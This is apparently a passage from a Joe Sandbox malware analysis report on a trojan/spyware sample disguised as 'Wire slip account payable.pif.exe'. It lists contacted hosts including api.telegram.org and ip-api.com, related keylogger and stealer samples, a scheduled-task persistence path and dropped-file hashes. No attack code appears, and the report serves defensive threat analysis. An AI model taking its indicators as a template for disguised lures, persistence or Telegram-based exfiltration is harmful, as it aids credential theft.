                                                                        http://www.jiyu-kobo.co.jp/Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ip-api.comWire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.galapagosdesign.com/DPleaseWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.fontbureau.com/designers8Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.fonts.comWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.sandoll.co.krWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.urwpp.deDPleaseWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.zhongyicts.com.cnWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://api.telegram.orgWire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.000000000318E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameWire slip account payable.pif.exe, 00000000.00000002.1739600975.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 00000009.00000002.1783883607.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.sakkal.comWire slip account payable.pif.exe, 00000000.00000002.1742697410.0000000005750000.00000004.00000020.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              208.95.112.1
                                                                                              ip-api.comUnited States
                                                                                              53334TUT-ASUSfalse
                                                                                              149.154.167.220
                                                                                              api.telegram.orgUnited Kingdom
                                                                                              62041TELEGRAMRUfalse
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1560051
                                                                                              Start date and time:2024-11-21 11:01:09 +01:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 9m 55s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:19
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:0
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Sample name:Wire slip account payable.pif.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@21/15@2/2
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 100%
                                                                                              • Number of executed functions: 179
                                                                                              • Number of non-executed functions: 20
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              • VT rate limit hit for: Wire slip account payable.pif.exe
                                                                                              TimeTypeDescription
                                                                                              05:02:02API Interceptor7360511x Sleep call for process: Wire slip account payable.pif.exe modified
                                                                                              05:02:05API Interceptor47x Sleep call for process: powershell.exe modified
                                                                                              05:02:07API Interceptor5250620x Sleep call for process: EQVRGq.exe modified
                                                                                              10:02:05Task SchedulerRun new task: EQVRGq path: C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              208.95.112.1HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                              • ip-api.com/line/
                                                                                              file.exeGet hashmaliciousJasonRATBrowse
                                                                                              • ip-api.com/json/?fields=11827
                                                                                              Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                                              • ip-api.com/line/?fields=hosting
                                                                                              BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                                              • ip-api.com/line/?fields=hosting
                                                                                              New_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • ip-api.com/line/?fields=hosting
                                                                                              seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                              • ip-api.com/line/?fields=hosting
                                                                                              DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • ip-api.com/line/?fields=hosting
                                                                                              Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                              • ip-api.com/line/?fields=hosting
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • ip-api.com/line/
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • ip-api.com/line/
                                                                                              149.154.167.220Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                          Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                              FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  ip-api.comhttp://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                                                  • 208.95.112.2
                                                                                                                  HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  file.exeGet hashmaliciousJasonRATBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  New_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  api.telegram.orgOrder requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  TELEGRAMRUOrder requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                  • 149.154.167.99
                                                                                                                  Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  TUT-ASUShttp://christians-google-sh-97m2.glide.page/dl/d0a5f4Get hashmaliciousUnknownBrowse
                                                                                                                  • 208.95.112.2
                                                                                                                  HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  file.exeGet hashmaliciousJasonRATBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  Fulloption_V2.1.exeGet hashmaliciousXWormBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  BoostFPS.exeGet hashmaliciousXWormBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  New_Order_Inquiry.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                  • 208.95.112.1
                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.comGet hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  https://ollama.com/Get hashmaliciousUnknownBrowse
                                                                                                                  • 149.154.167.220
                                                                                                                  No context
                                                                                                                  Process:C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1216
                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                  Process:C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1216
                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                  Malicious:true
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2232
                                                                                                                  Entropy (8bit):5.380747059108785
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:lGLHxvIIwLgZ2KRHWLOuggs
                                                                                                                  MD5:1A350305979C319A4159E5B381F62182
                                                                                                                  SHA1:31AF25FE595FE8079FFC0F3A2815A7F2E7D3A9AF
                                                                                                                  SHA-256:618CBCE901A674CF90F7A5DCF514F309283463B9623FE762533B3DCD38A1DFB3
                                                                                                                  SHA-512:A7662EF37D17505282498B663D62429CDB7F39406D7F723F28D3939B2A43FFD826F73DA4923E0B665AECEA8FCC8E8080B4C8465C23B32AB7EB4CC7AEA95AE850
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1572
                                                                                                                  Entropy (8bit):5.1171936231131365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTAv
                                                                                                                  MD5:80A85739E1CD45F1F854EF66BAD3CE81
                                                                                                                  SHA1:CA663350F89D88700B0A7D520C89347C095DDE30
                                                                                                                  SHA-256:E341FF8A573EEAFCFA15A44FB7FCC7461B67945FD00AAEB06A5DB25C903175A6
                                                                                                                  SHA-512:E1A900C45AABC9F1C8395727194AE4FD8D9E5DED1A91C87713DF8E537FF02CC860B0D9D16AABC1401F3637D76BA1B76E367170A6D4048FA7590094CC190FF7EB
                                                                                                                  Malicious:true
